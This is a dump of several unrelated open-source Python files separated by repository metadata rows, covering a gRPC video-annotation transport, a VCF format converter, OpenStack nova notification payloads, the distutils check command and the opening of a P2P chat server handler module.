Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def annotate_video(self) -> Callable[
[video_intelligence.AnnotateVideoRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the annotate video method over gRPC.
Performs asynchronous video annotation. Progress and results can
be retrieved through the ``google.longrunning.Operations``
interface. ``Operation.metadata`` contains
``AnnotateVideoProgress`` (progress). ``Operation.response``
contains ``AnnotateVideoResponse`` (results).
Returns:
Callable[[~.AnnotateVideoRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'annotate_video' not in self._stubs:
self._stubs['annotate_video'] = self.grpc_channel.unary_unary(
'/google.cloud.videointelligence.v1p1beta1.VideoIntelligenceService/AnnotateVideo',
request_serializer=video_intelligence.AnnotateVideoRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['annotate_video']
__all__ = (
'VideoIntelligenceServiceGrpcAsyncIOTransport',
)
| apache-2.0 | -4,601,164,260,622,470,700 | 45.365591 | 99 | 0.619125 | false | 4.782255 | false | false | false |
bioinform/somaticseq | somaticseq/vcfModifier/modify_JointSNVMix2.py | 1 | 3347 | #!/usr/bin/env python3
import argparse
import somaticseq.genomicFileHandler.genomic_file_handlers as genome
def run():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Variant Call Type, i.e., snp or indel
parser.add_argument('-infile', '--input-vcf', type=str, help='Input VCF file', required=True)
parser.add_argument('-outfile', '--output-vcf', type=str, help='Output VCF file', required=True)
# Parse the arguments:
args = parser.parse_args()
infile = args.input_vcf
outfile = args.output_vcf
return infile, outfile
def convert(infile, outfile):
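    # Convert a JointSNVMix2 VCF so downstream tools see standard fields:
    # each sample's RD is folded into AD as "ref,alt" and a GT value is
    # prepended, inferred from that sample's variant allele fraction.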
idx_chrom,idx_pos,idx_id,idx_ref,idx_alt,idx_qual,idx_filter,idx_info,idx_format,idx_SM1,idx_SM2 = 0,1,2,3,4,5,6,7,8,9,10
with genome.open_textfile(infile) as vcf, open(outfile, 'w') as vcfout:
line_i = vcf.readline().rstrip()
# VCF header
while line_i.startswith('#'):
if line_i.startswith('##FORMAT=<ID=AD,'):
line_i = '##FORMAT=<ID=AD,Number=.,Type=Integer,Description="Allelic depths for the ref and alt alleles in the order listed">'
vcfout.write( line_i + '\n')
line_i = vcf.readline().rstrip()
while line_i:
item = line_i.split('\t')
format_items = item[idx_format].split(':')
if 'AD' in format_items and 'RD' in format_items:
# NORMAL
idx_ad = format_items.index('AD')
idx_rd = format_items.index('RD')
format_items.pop(idx_rd)
item_normal = item[idx_SM1].split(':')
normal_ad = int(item_normal[idx_ad])
normal_rd = int(item_normal[idx_rd])
try:
vaf = normal_ad / (normal_ad + normal_rd)
except ZeroDivisionError:
vaf = 0
if vaf > 0.8:
normal_gt = '1/1'
elif vaf > 0.25:
normal_gt = '0/1'
else:
normal_gt = '0/0'
item_normal[idx_ad] = '{},{}'.format( item_normal[idx_rd] , item_normal[idx_ad] )
item_normal.pop(idx_rd)
item_normal = [normal_gt] + item_normal
# TUMOR
item_tumor = item[idx_SM2].split(':')
tumor_ad = int(item_tumor[idx_ad])
tumor_rd = int(item_tumor[idx_rd])
try:
vaf = tumor_ad / (tumor_ad + tumor_rd)
except ZeroDivisionError:
vaf = 0
if vaf > 0.8:
tumor_gt = '1/1'
else:
tumor_gt = '0/1'
item_tumor[idx_ad] = '{},{}'.format( item_tumor[idx_rd] , item_tumor[idx_ad] )
item_tumor.pop(idx_rd)
item_tumor = [tumor_gt] + item_tumor
# Rewrite
item[idx_format] = 'GT:' + ':'.join(format_items)
item[idx_SM1] = ':'.join(item_normal)
item[idx_SM2] = ':'.join(item_tumor)
line_i = '\t'.join(item)
vcfout.write(line_i+'\n')
line_i = vcf.readline().rstrip()
if __name__ == '__main__':
infile, outfile = run()
convert(infile, outfile)
| bsd-2-clause | 4,254,031,095,837,364,000 | 29.990741 | 142 | 0.501942 | false | 3.464803 | false | false | false |
phenoxim/nova | nova/notifications/objects/instance.py | 1 | 25085 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import nova.conf
from nova.notifications.objects import base
from nova.notifications.objects import flavor as flavor_payload
from nova.notifications.objects import keypair as keypair_payload
from nova.objects import base as nova_base
from nova.objects import fields
CONF = nova.conf.CONF
@nova_base.NovaObjectRegistry.register_notification
class InstancePayload(base.NotificationPayloadBase):
SCHEMA = {
'uuid': ('instance', 'uuid'),
'user_id': ('instance', 'user_id'),
'tenant_id': ('instance', 'project_id'),
'reservation_id': ('instance', 'reservation_id'),
'display_name': ('instance', 'display_name'),
'display_description': ('instance', 'display_description'),
'host_name': ('instance', 'hostname'),
'host': ('instance', 'host'),
'node': ('instance', 'node'),
'os_type': ('instance', 'os_type'),
'architecture': ('instance', 'architecture'),
'availability_zone': ('instance', 'availability_zone'),
'image_uuid': ('instance', 'image_ref'),
'key_name': ('instance', 'key_name'),
'kernel_id': ('instance', 'kernel_id'),
'ramdisk_id': ('instance', 'ramdisk_id'),
'created_at': ('instance', 'created_at'),
'launched_at': ('instance', 'launched_at'),
'terminated_at': ('instance', 'terminated_at'),
'deleted_at': ('instance', 'deleted_at'),
'updated_at': ('instance', 'updated_at'),
'state': ('instance', 'vm_state'),
'power_state': ('instance', 'power_state'),
'task_state': ('instance', 'task_state'),
'progress': ('instance', 'progress'),
'metadata': ('instance', 'metadata'),
'locked': ('instance', 'locked'),
'auto_disk_config': ('instance', 'auto_disk_config')
}
# Version 1.0: Initial version
# Version 1.1: add locked and display_description field
# Version 1.2: Add auto_disk_config field
# Version 1.3: Add key_name field
# Version 1.4: Add BDM related data
# Version 1.5: Add updated_at field
# Version 1.6: Add request_id field
VERSION = '1.6'
fields = {
'uuid': fields.UUIDField(),
'user_id': fields.StringField(nullable=True),
'tenant_id': fields.StringField(nullable=True),
'reservation_id': fields.StringField(nullable=True),
'display_name': fields.StringField(nullable=True),
'display_description': fields.StringField(nullable=True),
'host_name': fields.StringField(nullable=True),
'host': fields.StringField(nullable=True),
'node': fields.StringField(nullable=True),
'os_type': fields.StringField(nullable=True),
'architecture': fields.StringField(nullable=True),
'availability_zone': fields.StringField(nullable=True),
'flavor': fields.ObjectField('FlavorPayload'),
'image_uuid': fields.StringField(nullable=True),
'key_name': fields.StringField(nullable=True),
'kernel_id': fields.StringField(nullable=True),
'ramdisk_id': fields.StringField(nullable=True),
'created_at': fields.DateTimeField(nullable=True),
'launched_at': fields.DateTimeField(nullable=True),
'terminated_at': fields.DateTimeField(nullable=True),
'deleted_at': fields.DateTimeField(nullable=True),
'updated_at': fields.DateTimeField(nullable=True),
'state': fields.InstanceStateField(nullable=True),
'power_state': fields.InstancePowerStateField(nullable=True),
'task_state': fields.InstanceTaskStateField(nullable=True),
'progress': fields.IntegerField(nullable=True),
'ip_addresses': fields.ListOfObjectsField('IpPayload'),
'block_devices': fields.ListOfObjectsField('BlockDevicePayload',
nullable=True),
'metadata': fields.DictOfStringsField(),
'locked': fields.BooleanField(),
'auto_disk_config': fields.DiskConfigField(),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, bdms=None):
super(InstancePayload, self).__init__()
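        # Build the nested payloads (IP addresses, flavor, block devices)
        # from the instance before populating the flat schema fields.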
network_info = instance.get_network_info()
self.ip_addresses = IpPayload.from_network_info(network_info)
self.flavor = flavor_payload.FlavorPayload(flavor=instance.flavor)
if bdms is not None:
self.block_devices = BlockDevicePayload.from_bdms(bdms)
else:
self.block_devices = BlockDevicePayload.from_instance(instance)
        # NOTE(Kevin_Zheng): Don't include request_id for periodic tasks;
        # the RequestContext for periodic tasks does not include project_id
        # and user_id. Consider modifying this once periodic tasks get a
        # consistent request_id.
self.request_id = context.request_id if (context.project_id and
context.user_id) else None
self.populate_schema(instance=instance)
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionPayload(InstancePayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'fault': fields.ObjectField('ExceptionPayload', nullable=True),
'request_id': fields.StringField(nullable=True),
}
def __init__(self, context, instance, fault, bdms=None):
super(InstanceActionPayload, self).__init__(context=context,
instance=instance,
bdms=bdms)
self.fault = fault
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added key_name field to InstancePayload
# Version 1.2: Add BDM related data
# Version 1.3: Added updated_at field to InstancePayload
# Version 1.4: Added request_id field to InstancePayload
VERSION = '1.4'
fields = {
'volume_id': fields.UUIDField()
}
def __init__(self, context, instance, fault, volume_id):
super(InstanceActionVolumePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.volume_id = volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added auto_disk_config field to InstancePayload
# Version 1.3: Added key_name field to InstancePayload
# Version 1.4: Add BDM related data
# Version 1.5: Added updated_at field to InstancePayload
# Version 1.6: Added request_id field to InstancePayload
VERSION = '1.6'
fields = {
'old_volume_id': fields.UUIDField(),
'new_volume_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, old_volume_id, new_volume_id):
super(InstanceActionVolumeSwapPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.old_volume_id = old_volume_id
self.new_volume_id = new_volume_id
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreatePayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.2: Initial version. It starts at 1.2 to match with the version
# of the InstanceActionPayload at the time when this specific
# payload is created as a child of it so that the
# instance.create notification using this new payload does not
# have decreasing version.
# 1.3: Add keypairs field
# 1.4: Add key_name field to InstancePayload
# 1.5: Add BDM related data to InstancePayload
# 1.6: Add tags field to InstanceCreatePayload
# 1.7: Added updated_at field to InstancePayload
# 1.8: Added request_id field to InstancePayload
VERSION = '1.8'
fields = {
'keypairs': fields.ListOfObjectsField('KeypairPayload'),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, fault, bdms):
super(InstanceCreatePayload, self).__init__(
context=context,
instance=instance,
fault=fault,
bdms=bdms)
self.keypairs = [keypair_payload.KeypairPayload(keypair=keypair)
for keypair in instance.keypairs]
self.tags = [instance_tag.tag
for instance_tag in instance.tags]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionResizePrepPayload(InstanceActionPayload):
# No SCHEMA as all the additional fields are calculated
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'new_flavor': fields.ObjectField('FlavorPayload', nullable=True)
}
def __init__(self, context, instance, fault, new_flavor):
super(InstanceActionResizePrepPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.new_flavor = new_flavor
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdatePayload(InstancePayload):
# Version 1.0: Initial version
# Version 1.1: locked and display_description added to InstancePayload
# Version 1.2: Added tags field
# Version 1.3: Added auto_disk_config field to InstancePayload
# Version 1.4: Added key_name field to InstancePayload
# Version 1.5: Add BDM related data
# Version 1.6: Added updated_at field to InstancePayload
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'state_update': fields.ObjectField('InstanceStateUpdatePayload'),
'audit_period': fields.ObjectField('AuditPeriodPayload'),
'bandwidth': fields.ListOfObjectsField('BandwidthPayload'),
'old_display_name': fields.StringField(nullable=True),
'tags': fields.ListOfStringsField(),
}
def __init__(self, context, instance, state_update, audit_period,
bandwidth, old_display_name):
super(InstanceUpdatePayload, self).__init__(
context=context, instance=instance)
self.state_update = state_update
self.audit_period = audit_period
self.bandwidth = bandwidth
self.old_display_name = old_display_name
self.tags = [instance_tag.tag
for instance_tag in instance.tags.objects]
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescuePayload(InstanceActionPayload):
# Version 1.0: Initial version
# Version 1.1: Added request_id field to InstancePayload
VERSION = '1.1'
fields = {
'rescue_image_ref': fields.UUIDField(nullable=True)
}
def __init__(self, context, instance, fault, rescue_image_ref):
super(InstanceActionRescuePayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.rescue_image_ref = rescue_image_ref
@nova_base.NovaObjectRegistry.register_notification
class IpPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'label': fields.StringField(),
'mac': fields.MACAddressField(),
'meta': fields.DictOfStringsField(),
'port_uuid': fields.UUIDField(nullable=True),
'version': fields.IntegerField(),
'address': fields.IPV4AndV6AddressField(),
'device_name': fields.StringField(nullable=True)
}
def __init__(self, label, mac, meta, port_uuid, version, address,
device_name):
super(IpPayload, self).__init__()
self.label = label
self.mac = mac
self.meta = meta
self.port_uuid = port_uuid
self.version = version
self.address = address
self.device_name = device_name
@classmethod
def from_network_info(cls, network_info):
"""Returns a list of IpPayload object based on the passed
network_info.
"""
ips = []
if network_info is not None:
for vif in network_info:
for ip in vif.fixed_ips():
ips.append(cls(
label=vif["network"]["label"],
mac=vif["address"],
meta=vif["meta"],
port_uuid=vif["id"],
version=ip["version"],
address=ip["address"],
device_name=vif["devname"]))
return ips
@nova_base.NovaObjectRegistry.register_notification
class BandwidthPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'network_name': fields.StringField(),
'in_bytes': fields.IntegerField(),
'out_bytes': fields.IntegerField(),
}
def __init__(self, network_name, in_bytes, out_bytes):
super(BandwidthPayload, self).__init__()
self.network_name = network_name
self.in_bytes = in_bytes
self.out_bytes = out_bytes
@nova_base.NovaObjectRegistry.register_notification
class AuditPeriodPayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'audit_period_beginning': fields.DateTimeField(),
'audit_period_ending': fields.DateTimeField(),
}
def __init__(self, audit_period_beginning, audit_period_ending):
super(AuditPeriodPayload, self).__init__()
self.audit_period_beginning = audit_period_beginning
self.audit_period_ending = audit_period_ending
@nova_base.NovaObjectRegistry.register_notification
class BlockDevicePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
SCHEMA = {
'device_name': ('bdm', 'device_name'),
'boot_index': ('bdm', 'boot_index'),
'delete_on_termination': ('bdm', 'delete_on_termination'),
'volume_id': ('bdm', 'volume_id'),
'tag': ('bdm', 'tag')
}
fields = {
'device_name': fields.StringField(nullable=True),
'boot_index': fields.IntegerField(nullable=True),
'delete_on_termination': fields.BooleanField(default=False),
'volume_id': fields.UUIDField(),
'tag': fields.StringField(nullable=True)
}
def __init__(self, bdm):
super(BlockDevicePayload, self).__init__()
self.populate_schema(bdm=bdm)
@classmethod
def from_instance(cls, instance):
"""Returns a list of BlockDevicePayload objects based on the passed
bdms.
"""
if not CONF.notifications.bdms_in_notifications:
return None
instance_bdms = instance.get_bdms()
if instance_bdms is not None:
return cls.from_bdms(instance_bdms)
else:
return []
@classmethod
def from_bdms(cls, bdms):
"""Returns a list of BlockDevicePayload objects based on the passed
BlockDeviceMappingList.
"""
payloads = []
for bdm in bdms:
if bdm.volume_id is not None:
payloads.append(cls(bdm))
return payloads
@nova_base.NovaObjectRegistry.register_notification
class InstanceStateUpdatePayload(base.NotificationPayloadBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'old_state': fields.StringField(nullable=True),
'state': fields.StringField(nullable=True),
'old_task_state': fields.StringField(nullable=True),
'new_task_state': fields.StringField(nullable=True),
}
def __init__(self, old_state, state, old_task_state, new_task_state):
super(InstanceStateUpdatePayload, self).__init__()
self.old_state = old_state
self.state = state
self.old_task_state = old_task_state
self.new_task_state = new_task_state
@base.notification_sample('instance-delete-start.json')
@base.notification_sample('instance-delete-end.json')
@base.notification_sample('instance-pause-start.json')
@base.notification_sample('instance-pause-end.json')
@base.notification_sample('instance-unpause-start.json')
@base.notification_sample('instance-unpause-end.json')
@base.notification_sample('instance-resize-start.json')
@base.notification_sample('instance-resize-end.json')
@base.notification_sample('instance-resize-error.json')
@base.notification_sample('instance-suspend-start.json')
@base.notification_sample('instance-suspend-end.json')
@base.notification_sample('instance-power_on-start.json')
@base.notification_sample('instance-power_on-end.json')
@base.notification_sample('instance-power_off-start.json')
@base.notification_sample('instance-power_off-end.json')
@base.notification_sample('instance-reboot-start.json')
@base.notification_sample('instance-reboot-end.json')
@base.notification_sample('instance-reboot-error.json')
@base.notification_sample('instance-shutdown-start.json')
@base.notification_sample('instance-shutdown-end.json')
@base.notification_sample('instance-interface_attach-start.json')
@base.notification_sample('instance-interface_attach-end.json')
@base.notification_sample('instance-interface_attach-error.json')
@base.notification_sample('instance-shelve-start.json')
@base.notification_sample('instance-shelve-end.json')
@base.notification_sample('instance-resume-start.json')
@base.notification_sample('instance-resume-end.json')
@base.notification_sample('instance-restore-start.json')
@base.notification_sample('instance-restore-end.json')
@base.notification_sample('instance-evacuate.json')
@base.notification_sample('instance-resize_finish-start.json')
@base.notification_sample('instance-resize_finish-end.json')
@base.notification_sample('instance-live_migration_pre-start.json')
@base.notification_sample('instance-live_migration_pre-end.json')
@base.notification_sample('instance-live_migration_abort-start.json')
@base.notification_sample('instance-live_migration_abort-end.json')
# @base.notification_sample('instance-live_migration_post-start.json')
# @base.notification_sample('instance-live_migration_post-end.json')
@base.notification_sample('instance-live_migration_post_dest-start.json')
@base.notification_sample('instance-live_migration_post_dest-end.json')
@base.notification_sample('instance-live_migration_rollback-start.json')
@base.notification_sample('instance-live_migration_rollback-end.json')
# @base.notification_sample('instance-live_migration_rollback_dest-start.json')
# @base.notification_sample('instance-live_migration_rollback_dest-end.json')
@base.notification_sample('instance-rebuild-start.json')
@base.notification_sample('instance-rebuild-end.json')
@base.notification_sample('instance-rebuild-error.json')
@base.notification_sample('instance-interface_detach-start.json')
@base.notification_sample('instance-interface_detach-end.json')
@base.notification_sample('instance-resize_confirm-start.json')
@base.notification_sample('instance-resize_confirm-end.json')
@base.notification_sample('instance-resize_revert-start.json')
@base.notification_sample('instance-resize_revert-end.json')
@base.notification_sample('instance-shelve_offload-start.json')
@base.notification_sample('instance-shelve_offload-end.json')
@base.notification_sample('instance-soft_delete-start.json')
@base.notification_sample('instance-soft_delete-end.json')
@base.notification_sample('instance-trigger_crash_dump-start.json')
@base.notification_sample('instance-trigger_crash_dump-end.json')
@base.notification_sample('instance-unrescue-start.json')
@base.notification_sample('instance-unrescue-end.json')
@base.notification_sample('instance-unshelve-start.json')
@base.notification_sample('instance-unshelve-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionPayload')
}
@base.notification_sample('instance-update.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceUpdateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceUpdatePayload')
}
@base.notification_sample('instance-volume_swap-start.json')
@base.notification_sample('instance-volume_swap-end.json')
@base.notification_sample('instance-volume_swap-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeSwapNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumeSwapPayload')
}
@base.notification_sample('instance-volume_attach-start.json')
@base.notification_sample('instance-volume_attach-end.json')
@base.notification_sample('instance-volume_attach-error.json')
@base.notification_sample('instance-volume_detach-start.json')
@base.notification_sample('instance-volume_detach-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionVolumeNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionVolumePayload')
}
@base.notification_sample('instance-create-start.json')
@base.notification_sample('instance-create-end.json')
@base.notification_sample('instance-create-error.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceCreateNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceCreatePayload')
}
@base.notification_sample('instance-resize_prep-start.json')
@base.notification_sample('instance-resize_prep-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionResizePrepNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionResizePrepPayload')
}
@base.notification_sample('instance-snapshot-start.json')
@base.notification_sample('instance-snapshot-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionSnapshotPayload')
}
@base.notification_sample('instance-rescue-start.json')
@base.notification_sample('instance-rescue-end.json')
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionRescueNotification(base.NotificationBase):
# Version 1.0: Initial version
VERSION = '1.0'
fields = {
'payload': fields.ObjectField('InstanceActionRescuePayload')
}
@nova_base.NovaObjectRegistry.register_notification
class InstanceActionSnapshotPayload(InstanceActionPayload):
# Version 1.6: Initial version. It starts at version 1.6 as
# instance.snapshot.start and .end notifications are switched
# from using InstanceActionPayload 1.5 to this new payload and
# also it added a new field so we wanted to keep the version
# number increasing to signal the change.
# Version 1.7: Added request_id field to InstancePayload
VERSION = '1.7'
fields = {
'snapshot_image_id': fields.UUIDField(),
}
def __init__(self, context, instance, fault, snapshot_image_id):
super(InstanceActionSnapshotPayload, self).__init__(
context=context,
instance=instance,
fault=fault)
self.snapshot_image_id = snapshot_image_id
| apache-2.0 | -2,227,258,545,918,772,700 | 38.880763 | 79 | 0.673351 | false | 3.995063 | false | false | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.2/Lib/distutils/command/check.py | 1 | 5369 | """distutils.command.check
Implements the Distutils 'check' command.
"""
__revision__ = "$Id: check.py 85197 2010-10-03 14:18:09Z tarek.ziade $"
from distutils.core import Command
from distutils.errors import DistutilsSetupError
try:
# docutils is installed
from docutils.utils import Reporter
from docutils.parsers.rst import Parser
from docutils import frontend
from docutils import nodes
from io import StringIO
class SilentReporter(Reporter):
def __init__(self, source, report_level, halt_level, stream=None,
debug=0, encoding='ascii', error_handler='replace'):
self.messages = []
Reporter.__init__(self, source, report_level, halt_level, stream,
debug, encoding, error_handler)
def system_message(self, level, message, *children, **kwargs):
self.messages.append((level, message, children, kwargs))
HAS_DOCUTILS = True
except Exception:
# Catch all exceptions because exceptions besides ImportError probably
# indicate that docutils is not ported to Py3k.
HAS_DOCUTILS = False
class check(Command):
"""This command checks the meta-data of the package.
"""
description = ("perform some checks on the package")
user_options = [('metadata', 'm', 'Verify meta-data'),
('restructuredtext', 'r',
('Checks if long string meta-data syntax '
'are reStructuredText-compliant')),
('strict', 's',
'Will exit with an error if a check fails')]
boolean_options = ['metadata', 'restructuredtext', 'strict']
def initialize_options(self):
"""Sets default values for options."""
self.restructuredtext = 0
self.metadata = 1
self.strict = 0
self._warnings = 0
def finalize_options(self):
pass
def warn(self, msg):
"""Counts the number of warnings that occurs."""
self._warnings += 1
return Command.warn(self, msg)
def run(self):
"""Runs the command."""
# perform the various tests
if self.metadata:
self.check_metadata()
if self.restructuredtext:
if HAS_DOCUTILS:
self.check_restructuredtext()
elif self.strict:
raise DistutilsSetupError('The docutils package is needed.')
# let's raise an error in strict mode, if we have at least
# one warning
if self.strict and self._warnings > 0:
raise DistutilsSetupError('Please correct your package.')
def check_metadata(self):
"""Ensures that all required elements of meta-data are supplied.
name, version, URL, (author and author_email) or
        (maintainer and maintainer_email).
Warns if any are missing.
"""
metadata = self.distribution.metadata
missing = []
for attr in ('name', 'version', 'url'):
if not (hasattr(metadata, attr) and getattr(metadata, attr)):
missing.append(attr)
if missing:
self.warn("missing required meta-data: %s" % ', '.join(missing))
if metadata.author:
if not metadata.author_email:
self.warn("missing meta-data: if 'author' supplied, " +
"'author_email' must be supplied too")
elif metadata.maintainer:
if not metadata.maintainer_email:
self.warn("missing meta-data: if 'maintainer' supplied, " +
"'maintainer_email' must be supplied too")
else:
self.warn("missing meta-data: either (author and author_email) " +
"or (maintainer and maintainer_email) " +
"must be supplied")
def check_restructuredtext(self):
"""Checks if the long string fields are reST-compliant."""
data = self.distribution.get_long_description()
for warning in self._check_rst_data(data):
line = warning[-1].get('line')
if line is None:
warning = warning[1]
else:
warning = '%s (line %s)' % (warning[1], line)
self.warn(warning)
def _check_rst_data(self, data):
"""Returns warnings when the provided data doesn't compile."""
source_path = StringIO()
parser = Parser()
settings = frontend.OptionParser().get_default_values()
settings.tab_width = 4
settings.pep_references = None
settings.rfc_references = None
reporter = SilentReporter(source_path,
settings.report_level,
settings.halt_level,
stream=settings.warning_stream,
debug=settings.debug,
encoding=settings.error_encoding,
error_handler=settings.error_encoding_error_handler)
document = nodes.document(settings, reporter, source=source_path)
document.note_source(source_path, -1)
try:
parser.parse(data, document)
except AttributeError:
reporter.messages.append((-1, 'Could not finish the parsing.',
'', {}))
return reporter.messages
| mit | -768,187,753,055,831,900 | 36.284722 | 78 | 0.575899 | false | 4.672759 | false | false | false |
cbrunker/quip | lib/Handlers.py | 1 | 11422 | #
# Response handlers for P2P Server
#
import asyncio
import logging
from functools import partial
from hashlib import sha1, sha384
from uuid import uuid4
from os import path
from lib.Database import getFriendRequests, getSigningKeys, setUidMask, storeAuthority, setFriendAuth, getMessageKeys, \
setAddress, getFileRequests, storeFileRequest, delFileRequests, delFriendRequests, getFriendChecksum, \
updateFriendDetails, storeHistory
from lib.Utils import isValidUUID, sha1sum
from lib.Constants import BTRUE, BFALSE, WRITE_END, COMMAND_LENGTH, NONEXISTANT, PROFILE_VALUE_SEPARATOR, \
LIMIT_AVATAR_SIZE, MODIFIED_FILE
######################################
# Server Dispatch Coroutine Handlers
######################################
@asyncio.coroutine
def friendAcceptance(reader, writer, safe, profileId, data, requests=None):
"""
Handle incoming friend request acceptance (P2P)
Once a request has been made, and the destination user accepts, the destination user contacts the request user
who runs this coroutine to complete the friendship.
Requester->Server (quip client, friendRequest)
Server->Destination (Heartbeat token)
Destination->Server (quip client, getRequests)
